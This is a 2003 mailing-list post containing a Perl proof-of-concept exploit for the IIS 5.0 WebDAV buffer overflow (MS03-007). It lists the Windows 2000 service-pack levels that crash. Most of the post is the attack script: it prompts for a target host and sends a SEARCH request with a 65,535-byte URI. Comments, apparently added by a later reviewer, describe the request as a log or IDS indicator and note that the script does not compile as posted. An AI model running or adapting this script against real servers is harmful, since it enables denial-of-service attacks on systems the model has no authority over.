[VulnDiscuss] WebDav - IIS 5.0 - MS03-007
matrix
infowarfare.dk
Date: Mon Mar 24 2003 - 10:30:22 CST
# Tested on :
# W2K SP3 + the fix -> IIS issues an error
# W2K SP3 -> IIS temporarily crashes
# W2K SP2 -> IIS temporarily crashes
# W2K SP1 -> IIS does not crash, but issues a message
# about an internal error
#
# W2K -> IIS does not crash, but issues a message about
# an internal error
#
# Microsoft Security Bulletin MS03-007
#
# DISCLAIMER:
# The information in this bulletin is provided "AS IS" without warranty of any kind.
# In no event shall we be liable for any damages whatsoever including direct, indirect,
# incidental, consequential, loss of business profits or special damages.
#
# Coded by Matrix - www.infowarfare.dk
#
# If you put a debugger on the Inetinfo process you can see the result,
# And sorry about the code could be much more nice, but fuck, it works =)
#
#!/usr/bin/perl -w
#
# Proof-of-concept for the IIS 5.0 WebDAV overflow (MS03-007), as posted.
# Control flow: &intro -> &host (prompt for target) -> &scan -> &connect
# (send a single request) -> &exit.  The request is a WebDAV SEARCH whose
# Request-URI is 65535 'A' bytes; an oversized SEARCH URI like this is the
# indicator to look for in IIS logs or an IDS rule for this bug.
use strict;
use IO::Socket;
use LWP::Simple; # imported but not used by any sub in this file
# Globals Go Here.
my $host; # Host being probed (filled in by &host).
my $port; # Webserver port (filled in by &host).
my $Buffer; # "A" x 65535 -- becomes the oversized Request-URI path.
my $XMLShit; # XML body of the SEARCH request (a DAV: searchrequest).
$Buffer = "A" x 65535;
# NOTE(review): $Host_Header is never declared with `my` like the globals
# above, so under `use strict` this assignment does not compile as posted.
# The Host header is fixed to 127.0.0.1 regardless of $host, and
# Content-Length is a hard-coded 133 rather than derived from $XMLShit.
# The line breaks inside these two string literals look like mail-client
# wrapping of single lines -- confirm against the original.
$Host_Header = "Host: 127.0.0.1\r\nContent-type: text/xml\r\nContent-Length: 133
\r\n";
$XMLShit = "<?xml version=\"1.0\"?> \r\n<g:searchrequest
xmlns:g=\"DAV:\">\r\n<g:sql>\r\nSelect \"DAV:displayname\" from scope()
\r\n</g:sql>\r\n</g:searchrequest>\r\n";
# SUBROUTINES GO HERE.
# Script body.  The `&name;` call form passes the caller's @_ along, which
# is harmless here because none of these subs reads @_.
&intro;
&scan;
&exit; # Calls this file's own `exit` sub below, not the builtin.
# intro: prompt for the target via &host, then pause three seconds
# before &scan runs.
sub intro {
&host;
sleep 3;
};
# host subroutine: interactive prompt that fills the $host and $port
# globals.  `system('cls')` is the Windows clear-screen command, so the
# script was evidently written to run from a Windows shell.
sub host {
system('cls');
print "\n WebDAV OverFlow for IIS 5.0 by Matrix.";
print "\n http://www.infowarfare.dk";
print "\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "\n Host : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"}; # empty input -> localhost; no other validation of $host
print "\n Port : ";
$port=<STDIN>;
chomp $port;
# A port containing any non-digit, or left empty, falls back to 80.
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
}; # end host subroutine.
# scan subroutine: announce the target, then hand off to &connect, which
# sends the single request.
sub scan {
print "\n\n";
print "\nIIS 5.0 WebDAV BufferOverflow attack - $host on port $port ...";
print "\n";
&connect; # this file's own `connect` sub, not the socket builtin
};
# Connect subroutine: open one TCP connection to $host:$port, write the
# request, and close.  It shares its name with the `connect` builtin and
# is only reached via the `&connect` call form, which always selects the
# user-defined sub.  Nothing is read back from the socket, so the script
# itself cannot tell whether the server crashed, errored or ignored the
# request; the results in the header comment came from watching the
# Inetinfo process under a debugger.
sub connect {
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Could not connect to
$host \n";
$connection -> autoflush(1);
# It is here we put it all together and Flush the Buffer
# Wire format: "SEARCH /AAAA...(65535 bytes) HTTP/1.1", the fixed
# Host / Content-type / Content-Length headers, a blank line, then the
# DAV searchrequest XML.  Per the header comment a patched W2K SP3 server
# answers this with an error instead of crashing; the oversized SEARCH
# URI is what to alert on in web-server logs.
print $connection "SEARCH /$Buffer HTTP/1.1\r\n$Host_Header\r\n$XMLShit\r\n";
close $connection;
}; # end connect subroutine.
# exit subroutine: print a few blank lines, then terminate.  Inside the
# body the bare `exit;` resolves to the builtin (a same-named user sub
# does not override a builtin unless imported), so this does end the
# process; the top-level `&exit;` is what reaches this sub.
sub exit{
print "\n\n\n";
exit;
};